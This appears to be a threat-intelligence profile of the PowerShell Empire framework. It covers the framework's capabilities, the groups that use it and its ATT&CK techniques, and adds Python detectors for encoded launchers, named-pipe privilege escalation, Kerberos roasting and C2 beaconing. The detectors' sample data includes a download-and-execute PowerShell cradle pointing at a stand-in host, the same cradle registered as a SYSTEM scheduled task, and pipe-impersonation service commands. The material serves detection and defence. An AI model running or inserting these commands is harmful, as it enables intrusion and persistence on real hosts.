Empire
PowerShell Empire is a publicly available post-exploitation framework and malware family whose client-side agent runs primarily in PowerShell and whose operator interface is a command line. Public reporting states that it supports PowerShell remoting via the Invoke-PSRemoting module, can use Dropbox and GitHub for command and control, and can encrypt its C2 traffic with TLS.
Reported capabilities include: automatic collection of host metadata such as username, domain name, and machine name; enumeration of usernames and local/domain user account information; harvesting clipboard data on Windows and macOS; capturing webcam data on Windows and macOS; gathering browser data such as bookmarks and visited sites; sending collected data over its C2 channel; timestomping files or payloads; modifying service binaries and restoring them to their original state; and modules that search for files containing passwords. Its GetSystem functionality is implemented in PowerShell using PowerSploit's Get-System.ps1.
Empire has been observed in multiple intrusion contexts: it has been distributed by the SocGholish/FakeUpdates/GhoLoader malware loader, used by APT19 as a publicly available tool, deployed by Sednit/APT28 in parallel with the Graphite implant in a 2021 campaign, installed via SCT files that execute encoded PowerShell to download a staged Empire agent, referenced in AppleScript-based delivery on macOS, used by Sandworm to target Android developers in Ukraine, and used by Vice Society actors for lateral movement. The high-confidence examples in the reporting tie it to Windows and macOS systems and to both criminal and state-linked operations.
Vulnerabilities exploited
One CVE has been correlated with this family across public research and vendor advisories.
Graphite was deployed in a campaign against several governments in Europe and Asia. Attacks began with spear-phishing emails that delivered an Excel downloader carrying an exploit for CVE-2021-40444 (the MSHTML remote code execution vulnerability). This led to the installation of a second-stage downloader, followed by Graphite and a secondary payload, PowerShell Empire.
Groups observed using it
19 distinct threat actors have been attributed by public researchers.
For example, in the 2021 campaign documented by Trellix, Sednit deployed two implants in parallel: Graphite, which used OneDrive as its C&C channel, and PowerShell Empire, which relied on separate dedicated infrastructure.
APT19 has obtained and used publicly-available tools like Empire.
Techniques & procedures
37 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Execution
7 techniques
Scheduled Task/Job (T1053, https://attack.mitre.org/techniques/T1053/): Windows provides schtasks.exe so that administrators can run a program or script at a given date and time. Threat actors and red teams heavily abuse this as a persistence mechanism, and the task can be created either by hand or by a script. Within PowerShell Empire, such a script can be run on the agent by switching to command-line (shell) mode.
Although MITRE ATT&CK categorizes T1059.001 (PowerShell) as an Execution technique, it is routinely used for Defense Evasion as well. Attackers use PowerShell to: bypass the Antimalware Scan Interface (AMSI); disable Script Block Logging to prevent detection; disable Windows Defender; download and run malware payloads in memory; execute sophisticated code without installing extra software; inject malicious code into legitimate processes; and manipulate access tokens.
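As an added example (not code from this page or from the Empire project), the following Python decodes the -EncodedCommand payload found in process-creation command lines and scores the launcher shape Empire ships by default (powershell -noP -sta -w 1 -enc <base64 of a UTF-16LE script>), including the case where that launcher is wrapped in a schtasks /create task as described above. The sample command lines, the stand-in stager body, the address 192.0.2.10 and the indicator list are constructed for the example; the switch prefixes are the ones PowerShell genuinely accepts.

```python
import base64
import re

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -en, -enc, ...); the
# argument is base64 over the UTF-16LE script, which is how Empire's launcher ships it.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})")

# Switches the stock Empire launcher sets: "powershell -noP -sta -w 1 -enc <b64>"
LAUNCHER_FLAGS = {
    "noprofile": re.compile(r"(?i)\s-nop(?:rofile)?\b"),
    "sta": re.compile(r"(?i)\s-sta\b"),
    "hidden": re.compile(r"(?i)\s-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    "noninteractive": re.compile(r"(?i)\s-noni(?:nteractive)?\b"),
}

# Constructs worth flagging inside the decoded script (list is an assumption, extend it)
SCRIPT_INDICATORS = [
    ("download-cradle", re.compile(r"(?i)downloadstring|downloaddata|net\.webclient|invoke-webrequest")),
    ("in-memory-exec", re.compile(r"(?i)\biex\b|invoke-expression")),
    ("cert-validation-bypass", re.compile(r"(?i)servercertificatevalidationcallback")),
    ("nested-base64", re.compile(r"(?i)frombase64string")),
    ("amsi-tamper", re.compile(r"(?i)amsiutils|amsiinitfailed")),
]
SCHTASKS_CREATE = re.compile(r"(?i)\bschtasks(?:\.exe)?\b.*?/create")


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(token: str):
    """Return the decoded script, or None if the token is not valid -enc input."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd: str):
    """Decode and score one process-creation command line; None when it carries no -enc payload."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    decoded = decode_encoded_command(m.group(1))
    if decoded is None:
        return None
    flags = sorted(name for name, rx in LAUNCHER_FLAGS.items() if rx.search(cmd))
    indicators = sorted(name for name, rx in SCRIPT_INDICATORS if rx.search(decoded))
    persistence = bool(SCHTASKS_CREATE.search(cmd))  # launcher registered as a scheduled task
    score = len(flags) + 2 * len(indicators) + (2 if persistence else 0)
    return {"command": cmd, "decoded": decoded, "flags": flags,
            "indicators": indicators, "persistence": persistence, "score": score}


def triage(command_lines, threshold=5):
    """Findings at or above the threshold, highest score first."""
    found = [r for r in map(analyze_command_line, command_lines) if r and r["score"] >= threshold]
    return sorted(found, key=lambda r: r["score"], reverse=True)


# Constructed sample command lines (not real telemetry). The stager body is a stand-in
# download cradle; a real Empire stage0 is longer but has the same shape.
STAGER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/admin/get.php')"
ADMIN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running'"
SAMPLE_LINES = [
    f"powershell -noP -sta -w 1 -enc {encode_ps(STAGER_SCRIPT)}",
    f'schtasks.exe /create /tn "WindowsUpdateCheck" /tr "powershell -noP -sta -w 1 -enc {encode_ps(STAGER_SCRIPT)}" /sc onlogon /ru SYSTEM',
    f"powershell.exe -NoProfile -EncodedCommand {encode_ps(ADMIN_SCRIPT)}",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit["score"], hit["flags"], hit["indicators"], "scheduled-task" if hit["persistence"] else "")
        print("   ", hit["decoded"])
```

The benign -NoProfile -EncodedCommand line scores 1 and the plain -File invocation is ignored, so the decoded content, not the mere presence of encoding, drives the score; in production feed it Sysmon event 1 or Security 4688 command lines and tune the threshold against your own administrative scripts.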
AppleScript offers offensive actors a plethora of ways to execute. In addition to simply executing a .scpt file, you can run AppleScripts from Mail rules, from a shell script, in memory, from the command line, from within a Mach-O binary, from a plain-text uncompiled file, from an Automator workflow, from a Folder Action, from a Finder Service, or from a Calendar event.
Persistence
5 techniques
Scheduled Task/Job (T1053, https://attack.mitre.org/techniques/T1053/): the schtasks.exe abuse described under Execution, which ATT&CK also maps to Persistence because a registered task re-runs the payload on every trigger.
Public reporting repeatedly describes malware and threat actors establishing persistence by adding values under HKCU or HKLM\Software\Microsoft\Windows\CurrentVersion\Run (or the RunOnce equivalents) and by placing executables, scripts, or .lnk files in the Startup folder; wording such as 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' recurs across the sources.
Both tools compared in the quoted source first attempt "named pipe impersonation" to achieve SYSTEM privileges: the payload creates a Windows service that runs as NT AUTHORITY\SYSTEM and has that service write to a named pipe the payload created under a random name, so that the payload can impersonate the connecting SYSTEM client.
Privilege Escalation
5 techniques
Scheduled Task/Job (T1053, https://attack.mitre.org/techniques/T1053/): the same schtasks.exe abuse described under Execution; ATT&CK also maps it to Privilege Escalation because a task can be registered to run under a more privileged account such as SYSTEM.
Both tools compared in the quoted source first attempt "named pipe impersonation" to achieve SYSTEM privileges: the payload creates a Windows service that runs as NT AUTHORITY\SYSTEM and has that service write to a named pipe the payload created under a random name, so that the payload can impersonate the connecting SYSTEM client.
Public reporting also repeatedly describes persistence through values under HKCU or HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce and through executables, scripts, or .lnk files dropped in the Startup folder, which ATT&CK maps to this tactic as well.
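The service-plus-pipe pattern described above leaves a System log 7045 (service installed) event whose ImagePath is a cmd.exe or %COMSPEC% one-liner echoing into \\.\pipe\<name>, registered to run as LocalSystem. The Python below is an added example, not code from this page or from any of the tools it mentions; it scores constructed 7045 records for that shape. The two malicious ImagePaths are modelled on published getsystem implementations but are assumptions, not captured values, and the scoring weights are arbitrary starting points.

```python
import re

# Service command used for named-pipe impersonation: cmd.exe (or %COMSPEC%) runs as
# SYSTEM and writes something into a pipe the payload created, so the payload can call
# ImpersonateNamedPipeClient on the SYSTEM-owned connection. Pattern is an assumption.
PIPE_ECHO = re.compile(r"(?i)(?:cmd(?:\.exe)?|%COMSPEC%).*?\becho\b.*?>\s*\\\\\.\\pipe\\([\w.-]+)")
PIPE_REF = re.compile(r"(?i)\\\\\.\\pipe\\([\w.-]+)")
SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system"}
WEIGHTS = {"cmd-echo-into-named-pipe": 5, "named-pipe-in-binpath": 1, "runs-as-system": 1}


def assess_service_install(event: dict) -> dict:
    """Score one System/7045 (service installed) record for getsystem-style abuse."""
    image = event.get("ImagePath", "")
    reasons, pipe = [], None
    m = PIPE_ECHO.search(image)
    if m:
        pipe = m.group(1)
        reasons.append("cmd-echo-into-named-pipe")
    else:
        m = PIPE_REF.search(image)
        if m:  # a pipe in the binPath alone is weak: some agents pass pipe names legitimately
            pipe = m.group(1)
            reasons.append("named-pipe-in-binpath")
    if reasons and event.get("AccountName", "").lower() in SYSTEM_ACCOUNTS:
        reasons.append("runs-as-system")
    return {"service": event.get("ServiceName"), "pipe": pipe, "reasons": reasons,
            "score": sum(WEIGHTS[r] for r in reasons)}


def detect_getsystem_services(events, threshold=5):
    """Records at or above the threshold, highest score first (stable for ties)."""
    hits = [assess_service_install(e) for e in events]
    return sorted((h for h in hits if h["score"] >= threshold), key=lambda h: -h["score"])


# Constructed 7045 records (field names follow the System log event: ServiceName, ImagePath, AccountName)
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "aqwzsx", "AccountName": "LocalSystem",
     "ImagePath": r"%COMSPEC% /c echo aqwzsx > \\.\pipe\aqwzsx"},
    {"EventID": 7045, "ServiceName": "kzjhfq", "AccountName": "LocalSystem",
     "ImagePath": r"%COMSPEC% /C start %COMSPEC% /C timeout /t 3 >nul&&echo kzjhfq > \\.\pipe\kzjhfq"},
    {"EventID": 7045, "ServiceName": "VendorAgent", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --pipe \\.\pipe\vendor-agent'},
    {"EventID": 7045, "ServiceName": "Spooler", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for hit in detect_getsystem_services(SAMPLE_EVENTS):
        print(hit["score"], hit["service"], hit["pipe"], hit["reasons"])
```

To confirm a hit, correlate the captured pipe name with Sysmon event 17 (pipe created) from the agent process and event 18 (pipe connected) from the service's cmd.exe within the same few seconds; the service is usually deleted right after, so the 7045 record may be the only durable artifact.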
Stealth
5 techniques
Skilled attackers continually seek out new attack vectors while employing evasion techniques to maintain the effectiveness of old vectors in an ever-changing defensive landscape... numerous threat actors employ obfuscation frameworks... In June 2017, the Advanced Practices Team identified FIN7 ... testing a novel obfuscation technique native to cmd.exe.
APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.
Both tools compared in the quoted source first attempt "named pipe impersonation" to achieve SYSTEM privileges: the payload creates a Windows service that runs as NT AUTHORITY\SYSTEM and has that service write to a named pipe the payload created under a random name, so that the payload can impersonate the connecting SYSTEM client.
APT32 ... often downloads this second stage using the regsvr32.exe remote download technique known as “Squiblydoo”. To evade rigid signatures for this technique that rely on command line argument values /i:http:// or /i:https:// being present, APT32 first used cmd.exe’s escape character, the caret (^), and then in this later example used double quotes to break up these arguments.
Defense Impairment
1 technique
Credential Access
3 techniques
There are cases when we would like to fetch the user's password, or their TGT (Ticket Granting Ticket) for Kerberos.
Kerberoasting TL;DR: attackers request service tickets for SPN-bearing accounts tied to high-privileged services. Each ticket is encrypted with a key derived from the service account's password, so they extract the tickets and crack them offline to retrieve the plaintext password.
AS-REP Roasting (MITRE ATT&CK T1558.004) abuses accounts with the 'Do not require Kerberos preauthentication' setting enabled. This is a misconfiguration rather than a flaw in Kerberos: for such an account the KDC returns an AS-REP without the client first proving knowledge of the password, and part of that reply is encrypted with a key derived from the user's password, so an adversary can request it for any such account and crack the password offline.
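Both attacks above leave a trace on the domain controller: Kerberoasting as a burst of 4769 (service ticket requested) events with RC4-HMAC encryption (TicketEncryptionType 0x17) for several distinct service accounts from one principal, AS-REP roasting as a 4768 (TGT requested) event with PreAuthType 0. The Python below is an added example, not from this page or from any cited tool; the events are constructed dictionaries whose keys follow the Windows event XML field names, and the window and threshold values are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC, the cheap-to-crack type roasting tools ask for


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def kerberoast_bursts(events, window=timedelta(minutes=5), min_spns=3):
    """4769: one principal pulling RC4 service tickets for several service accounts inside `window`."""
    by_user = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status", "0x0") != "0x0":
            continue
        if e.get("TicketEncryptionType", "").lower() != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        # Skip the KDC's own TGS renewals and computer accounts (long random passwords, not crackable)
        if svc.lower().startswith("krbtgt") or svc.endswith("$"):
            continue
        by_user[e["TargetUserName"]].append((_ts(e), svc, e.get("IpAddress")))
    alerts = []
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _, ip) in enumerate(reqs):  # sliding window anchored on each request
            spns = {svc for t, svc, _ in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                alerts.append({"user": user, "source_ip": ip, "start": t0.isoformat(), "spns": sorted(spns)})
                break
    return alerts


def asrep_roast_candidates(events):
    """4768 with PreAuthType 0: the KDC issued an AS-REP without the client proving the password."""
    return [{"user": e["TargetUserName"], "source_ip": e.get("IpAddress"), "enc": e.get("TicketEncryptionType")}
            for e in events
            if e.get("EventID") == 4768 and e.get("PreAuthType") == "0" and e.get("Status", "0x0") == "0x0"]


# Constructed Security log records (not real telemetry); jdoe roasts three accounts within seconds
SAMPLE_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:00", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.23", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.23", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:03", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.23", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:04", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.23", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:05", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.23", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:01:00", "TargetUserName": "asmith@CORP.EXAMPLE",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.40", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:01:10", "TargetUserName": "asmith@CORP.EXAMPLE",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.40", "Status": "0x0"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T10:02:00", "TargetUserName": "svc_legacy",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.23", "Status": "0x0"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T10:02:30", "TargetUserName": "jdoe",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.23", "Status": "0x0"},
]

if __name__ == "__main__":
    print(kerberoast_bursts(SAMPLE_EVENTS))
    print(asrep_roast_candidates(SAMPLE_EVENTS))
```

Two caveats: 4769 is only emitted when "Audit Kerberos Service Ticket Operations" is enabled on the DCs, and current roasting tools can ask for AES tickets (0x12) to dodge the RC4 filter, so pair this with a baseline on the number of distinct service accounts a principal requests tickets for, regardless of encryption type.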
Discovery
7 techniques
Public reporting repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
Public reporting repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami, query user, or quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
Use in conjunction with other contextual indicators: for example, detect network discovery and lateral movement attempts by unusual HASSH values (SSH client fingerprints) such as those produced by Paramiko, PowerShell, Ruby, Meterpreter, and Empire.
Public reporting repeatedly describes malware and threat actors obtaining lists of running processes with utilities and APIs such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, and EnumProcesses.
Empire can automatically gather the username, domain name, machine name, and other information from a compromised system... In Operation Wocao, threat actors used a script to collect information about the infected system... RotaJakiro executes a set of commands to collect device information and sends the collected information to the C2 server.
Public reporting repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension, name, or path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Lateral Movement
2 techniques
"CrackMapExec can execute PowerShell commands via WMI," "Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module," and "In the Triton Safety Instrumented System Attack, TEMP.Veles used a publicly available PowerShell-based tool, WMImplant."
Collection
3 techniques
Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.
Agrius used a custom tool, sql.net4.exe, to query SQL databases and then identify and extract personally identifiable information... AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration... Ember Bear engages in mass collection from compromised systems during intrusions.
Command and Control
6 techniques
And if everything works well, we’ll get that beacon communicating to our front end servers.
Public reporting repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, for example: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."
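As an added example (not this page's or Empire's own code), the following Python scores proxy records against Empire's shipped HTTP listener defaults (the profile URIs /admin/get.php, /news.php and /login/process.php, the IE11-style User-Agent string, and a 5-second beacon with no jitter), combined with a timing-regularity check so that a single coincidental URI hit does not fire on its own. The log lines and the addresses 10.0.0.23, 10.0.0.40 and 203.0.113.7 are constructed; operators routinely change the profile, so the profile match is the weaker signal and the periodicity check the more durable one.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Empire's default listener profile: beacon URIs and User-Agent (operators change these)
DEFAULT_PROFILE_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
DEFAULT_PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"


def parse_log(lines):
    """Parse constructed tab-separated proxy records: timestamp, src, method, url, user-agent."""
    records = []
    for line in lines:
        ts, src, method, url, ua = line.rstrip("\n").split("\t")
        parts = urlsplit(url)
        records.append({"ts": datetime.fromisoformat(ts), "src": src, "method": method,
                        "host": parts.netloc, "path": parts.path, "ua": ua})
    return records


def profile_hits(records, uris=DEFAULT_PROFILE_URIS, ua=DEFAULT_PROFILE_UA,
                 min_requests=4, max_cv=0.2):
    """Score each (source, destination host) pair: profile URI hits, UA match, and beacon regularity.
    Regularity is the coefficient of variation of inter-request gaps; zero jitter gives cv == 0."""
    pairs = defaultdict(list)
    for r in records:
        pairs[(r["src"], r["host"])].append(r)
    results = []
    for (src, host), reqs in pairs.items():
        reqs.sort(key=lambda r: r["ts"])
        uri_hits = sum(r["path"] in uris for r in reqs)
        ua_hits = sum(r["ua"] == ua for r in reqs)
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        cv = None
        if len(reqs) >= min_requests and len(gaps) >= 2 and statistics.mean(gaps) > 0:
            cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        periodic = cv is not None and cv <= max_cv
        score = (2 if uri_hits else 0) + (3 if ua_hits else 0) + (2 if periodic else 0)
        if score:
            results.append({"src": src, "host": host, "requests": len(reqs), "uri_hits": uri_hits,
                            "ua_hits": ua_hits, "interval_cv": cv, "periodic": periodic, "score": score})
    return sorted(results, key=lambda x: x["score"], reverse=True)


def build_sample_log():
    """Constructed proxy log: one beaconing host plus ordinary browsing (not real traffic)."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    uris = sorted(DEFAULT_PROFILE_URIS)
    chrome = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"
    lines = [f"{(base + timedelta(seconds=5 * i)).isoformat()}\t10.0.0.23\tGET\thttp://203.0.113.7{uris[i % 3]}\t{DEFAULT_PROFILE_UA}"
             for i in range(6)]  # default 5-second delay, zero jitter
    lines.append(f"{(base + timedelta(seconds=7)).isoformat()}\t10.0.0.23\tGET\thttps://www.example.com/index.html\t{chrome}")
    lines.append(f"{(base + timedelta(seconds=9)).isoformat()}\t10.0.0.40\tGET\thttps://www.example.com/news.php\t{chrome}")
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for hit in profile_hits(parse_log(SAMPLE_LOG)):
        print(hit["score"], hit["src"], "->", hit["host"], "periodic" if hit["periodic"] else "", hit["interval_cv"])
```

The ordinary visit to www.example.com/news.php scores 2 (URI only) while the beaconing pair scores 7, which is the separation you want before alerting; with TLS-encrypted C2 the URI and User-Agent are invisible to a passive sensor and only the timing check survives, so keep the periodicity part in any production rule.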
The adversaries had communicated to both Dropbox and Pastebin. APT28 has used Google Drive for C2. APT37 leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.
If the user installs such an "update", malware is downloaded onto the victim's device.
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
7 indicators have been attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
168 sources are tracked across advisories, community write-ups, and news.
Post-exploitation framework previously distributed via SocGholish.
Named malware/tool family deployed via SocGholish.
Post-exploitation framework used by APT28 alongside other implants in targeted intrusions.
An open-source post-exploitation framework used by Sednit in parallel with Graphite in a 2021 campaign, relying on separate dedicated infrastructure.